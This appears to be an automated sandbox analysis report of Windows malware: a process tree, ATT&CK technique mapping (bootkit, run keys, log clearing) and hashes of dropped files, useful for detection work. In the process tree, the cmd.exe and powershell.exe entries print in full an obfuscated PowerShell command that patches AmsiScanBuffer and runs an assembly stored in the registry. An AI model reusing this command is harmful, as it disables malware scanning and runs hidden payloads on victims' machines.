C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4284
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3312
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:5092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1608
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:60
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3512
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2912
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:4240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3264
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3660
-
C:\Windows\system32\cmd.execmd.exe /c "powershell.exe -Command ""function Local:ixJsXCiRfEUQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZktEpIReOhMVLC,[Parameter(Position=1)][Type]$YwANeYfFPM)$kiJglowNMxe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+'y'+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'pe',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed,'+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+'u'+'t'+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kiJglowNMxe.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$kiJglowNMxe.DefineMethod(''+'I'+''+[Char](110)+'vok'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'o'+'t'+','+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$YwANeYfFPM,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $kiJglowNMxe.CreateType();}$DlxKVBGGtKAGD=([AppDomain]::CurrentDomain.GetAssemblies()^|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+'.'+[Char](85)+'n'+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$WyoHgUIpGolHzy=$DlxKVBGGtKAGD.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WlVpXCELLYTTQIUSKZQ=ixJsXCiRfEUQ @([String])([IntPtr]);$ZYjepCqRgiKfRsbZrairsl=ixJsXCiRfEUQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$giJPzSdQLwX=$DlxKVBGGtKAGD.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+'dl'+[Char](108)+'')));$rUjyHAEdCDJlQe=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$AdeZnrDSnmAKKAnlU=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+'l'+'P'+'r'+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MjbPiOm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUjyHAEdCDJlQe,$WlVpXCELLYTTQIUSKZQ).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$XupAgXbWoKxwwHGVt=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$MjbPiOm,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$WDFgBWdanW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,4,[ref]$WDFgBWdanW);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](177-46),[Byte](7+186),[Byte](196-196),[Byte](247-63),[Byte](205-118),[Byte](218-218),[Byte](52-45),[Byte](186-58),[Byte](34+97),[Byte](41+151),[Byte](55-55),[Byte](106+89),[Byte](23+114),[Byte](157+35)),0,$XupAgXbWoKxwwHGVt,79-65);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,0x20,[ref]$WDFgBWdanW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+'W'+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"""1⤵
- System Time Discovery
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command ""function Local:ixJsXCiRfEUQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZktEpIReOhMVLC,[Parameter(Position=1)][Type]$YwANeYfFPM)$kiJglowNMxe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+'y'+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'pe',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed,'+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+'u'+'t'+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kiJglowNMxe.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$kiJglowNMxe.DefineMethod(''+'I'+''+[Char](110)+'vok'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'o'+'t'+','+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$YwANeYfFPM,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $kiJglowNMxe.CreateType();}$DlxKVBGGtKAGD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+'.'+[Char](85)+'n'+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$WyoHgUIpGolHzy=$DlxKVBGGtKAGD.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WlVpXCELLYTTQIUSKZQ=ixJsXCiRfEUQ @([String])([IntPtr]);$ZYjepCqRgiKfRsbZrairsl=ixJsXCiRfEUQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$giJPzSdQLwX=$DlxKVBGGtKAGD.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+'dl'+[Char](108)+'')));$rUjyHAEdCDJlQe=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$AdeZnrDSnmAKKAnlU=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+'l'+'P'+'r'+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MjbPiOm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUjyHAEdCDJlQe,$WlVpXCELLYTTQIUSKZQ).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$XupAgXbWoKxwwHGVt=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$MjbPiOm,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$WDFgBWdanW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,4,[ref]$WDFgBWdanW);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](177-46),[Byte](7+186),[Byte](196-196),[Byte](247-63),[Byte](205-118),[Byte](218-218),[Byte](52-45),[Byte](186-58),[Byte](34+97),[Byte](41+151),[Byte](55-55),[Byte](106+89),[Byte](23+114),[Byte](157+35)),0,$XupAgXbWoKxwwHGVt,79-65);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,0x20,[ref]$WDFgBWdanW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+'W'+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)""2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:556
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1240
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 4c6493209c74b66ed848b0bb7851a75d X5hIRpOBwEyEV9L1cOjF+w.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:3696 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1364
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:1084
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:3796
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:4876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
- Modifies data under HKEY_USERS
PID:1132
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:2564
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5568
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6008
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5384
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
Filesize
1KB
MD5509b266bbe8945b50821ec812a33ef79
SHA1b3f95bb17a43f48c5872f68c202c08d9e8e76215
SHA256dbfe3c5f2f83685e49aab42a18f5f182f18524066b33c302c9e45c49a550ab75
SHA512b9912feed43f8d8812923d99f46bb90a19b6be218bc2f948e5b755fe6dee2c121c52a947948786c694f29af7d93d6b07ff870ae09f9d358276dc53e65da0aa07
-
Filesize
425B
MD58c7889bde41724ce3db7c67e730677f6
SHA1485891cc9120cb2203a2483754dbd5e6ea24f28e
SHA25683c70bfcb1b41892c9c50cabe9bc2d96b2f7420b28545afabd32f682ac62d0ad
SHA512b7c3aab27fc924dcaef78987b492931e164b9e30b813c532fe87e1d40001ed1861c4b5ddbdd85cd2278681a22e32eee816877f4f63cecaa9972976d87e38f5cc
-
Filesize
105KB
MD5d3c7a91ce6bb120bc472d385e1c3b9a2
SHA1f5fcb8211302e2506cf2c238b1e8e2d8b29bdccd
SHA256bdd406bfbc081a963756e854eb7a9ee4b487b0e2bf8c11344a2a35bc135b9d2c
SHA512ec12df5e66bdd436d4c71b94d3df73d64ca756c05f979c1ef3ab49cca0f351781c1bd8cb01d3924fc2ea099bb2da812e5d30d0084e567f9dd13dffb913c6b207
-
Filesize
280B
MD536a170166e1d02a57f7ac9055ba51bfe
SHA14725e212188d028a2523aa8842f89f066e23c470
SHA256e264a8577e5d98a5a95c037b28aaa7b5c05a7024eb28c1ffe70e20506a0e2565
SHA51220ad966064b3f45b7d458f37949cf4b49eb48ea0628b1c0ee5070f1619799c92a44a85dfc008d5f69ab5835cdd04887f61631e0b13d4c3997e330b3d13405f8e
-
Filesize
280B
MD55abc0e33ebed0d37902104ce91547641
SHA17cc9184b9d474c4ee5c4d6d252466419103a2e95
SHA25661b85522362a45cf497cc8a76dde42c0158e58d50b268722a5b9bc08103cfb91
SHA512e7f95362b191ff3846d5a63342bc9be36c7563c10c01855c65f42b05d7664f67a4edffc1c342415fbdaae3deb3c03ca0efa6e3ddbc9ffbce6b2da2f60bf1ff3b
-
Filesize
280B
MD53f041618f4244a27886ca1cb7ba8379c
SHA1d9abdf7e2f8dfb40a11c18e8a076b90dae824f77
SHA256144cfd00abb98d0a0257962c3ec4dbc4b973942fbb19501489275f2cbbef621a
SHA512be2ec06cb0246ba0331142869a3a14352f7b5676cb74f1aca6a0462fe116ea8b6e698a0c836aa52eab1da521133d7849ec6a79dc61ee56068726fb8bccbdf25b
-
Filesize
280B
MD57e0e074f657fe1d92b0cde89b9e2ca9a
SHA182d814aecc4bce47584a2f0b85b338233cbcc27e
SHA256dee29c3f8d77ae0f26f7d2011fca87398b3c7a34402bdd625e72ba09bd9ec915
SHA5128a05e0024f13b57313bbbd467a1bcd001c6d116a94c37e33a738a9c985c0b7d749f1c9e1ed8d4f17668ac173b44bf51964e1cdcdf895c8b1549ef6eb5a0836c1
-
Filesize
44KB
MD57170bab95c622125d10eb251afe48a61
SHA1b3348bcd6cf5d63e57a8a7ea7744c4a962b39120
SHA2568dc68d6fddd87aed35bf7932d155d98f2da7f52b45a4c71e3c36c539aa49de62
SHA512a2ba2598de888120c0c6ab5e1798073a2d765db83a5ab5fd9c2198687875a0d24e065e69004ada98b5830048979532db5d5aa1f75ebfeb92a53bc7f1037b1465
-
Filesize
264KB
MD50796b16a7677d2a527106bf3851e03e5
SHA12b4ccbb0ec666084c4b791352844d524212b27d8
SHA256b008a7ff027320a90d783a8ae837ce019274cdc6acc0ed0dfedfb36d1372e784
SHA512d75ced280d60606465f55458e9136da431242db7a3c075b42ff21e065878655119a37b408891aa3bb64be00b993f560ddef5a907f7fc69b459aeb6e2b0817425
-
Filesize
1.0MB
MD53a687c4d87c3f2c49de7d1e9bdc47b42
SHA1d627958220319aea43c686268fc99ffcacc472e8
SHA256b2918b5bbf05b8b0d876fea5085aa852e98712a84cec7ed6fe1a9868199f6b9c
SHA5121bdf5a3afe3612f751b7bfd10c9a93237ad8ed726d7a15bff318899c42df5281c42643cf9ea7d7d24576e7de2448e87a4d730b6a27d7ff0c50a7cdfcc21465ba
-
Filesize
4.0MB
MD55bbf1b8d8c65faf1616359fcd2ab2779
SHA1e5d202abe5b67ab6939a094b651f7bb16fe2eeb3
SHA25684c6e6f7fe4de6cce346798708b08177e51ede15f0caaac1e7ba1c5451179882
SHA512dcd29d93d8c02fa9836bdc83723cd8f220009379d194d62eab405ad9477c0cb2aaaea51757f97d1092b63d50d862e8d5abbd8a8b13d31a957abf30975ac9063a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize3KB
MD5f049e4c33c7d71aca154c0d6c7779621
SHA1b8064b4d0a2b9a0735e6773eb03f6ce1225e752f
SHA256c71b6426b002fc8514c2c290a1e858a8513a99a5d8da37e431daab402a33e509
SHA512c10507fa008c44051a8cb62ab7e5cc71c211f4f0c79372e14e2937242bf7b63db005a6d0be9efb18ce78b9aa68bd54e5f6a63ee930f96c1271c3d594ab2fb7ac
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57e8ca.TMP
Filesize3KB
MD5aee35b5bfafd8e559bd80327358cb438
SHA1e354059097215228f438a256c1dc6b655cda609e
SHA25603133790c769788ac46ee2f479167c1944f6301ae013e265b9b9fdb63004fd35
SHA5120183f18ffa456139d3fdd798530c6328349b8ba0ba4ed73f7be1688501cb537be7328bce2a150c98ae4e111d47e5bfa9b4ceb05f17476777da864aed7e5084e3
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json
Filesize429B
MD55d1d9020ccefd76ca661902e0c229087
SHA1dcf2aa4a1c626ec7ffd9abd284d29b269d78fcb6
SHA256b829b0df7e3f2391bfba70090eb4ce2ba6a978ccd665eebf1073849bdd4b8fb9
SHA5125f6e72720e64a7ac19f191f0179992745d5136d41dcdc13c5c3c2e35a71eb227570bd47c7b376658ef670b75929abeebd8ef470d1e24b595a11d320ec1479e3c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\verified_contents.json
Filesize1KB
MD5738e757b92939b24cdbbd0efc2601315
SHA177058cbafa625aafbea867052136c11ad3332143
SHA256d23b2ba94ba22bbb681e6362ae5870acd8a3280fa9e7241b86a9e12982968947
SHA512dca3e12dd5a9f1802db6d11b009fce2b787e79b9f730094367c9f26d1d87af1ea072ff5b10888648fb1231dd83475cf45594bb0c9915b655ee363a3127a5ffc2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js
Filesize9KB
MD53d20584f7f6c8eac79e17cca4207fb79
SHA13c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA2560d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59
-
Filesize
192KB
MD50a0aaa39a4f7213adbab05520ddf8f12
SHA18322e755bdcfbb0c25b71d8b6faace19d5b01c30
SHA2565c5f64aefc90312644fe5c3f217d9cfd8f55d3ea79963c6c37d45700f9bea7f2
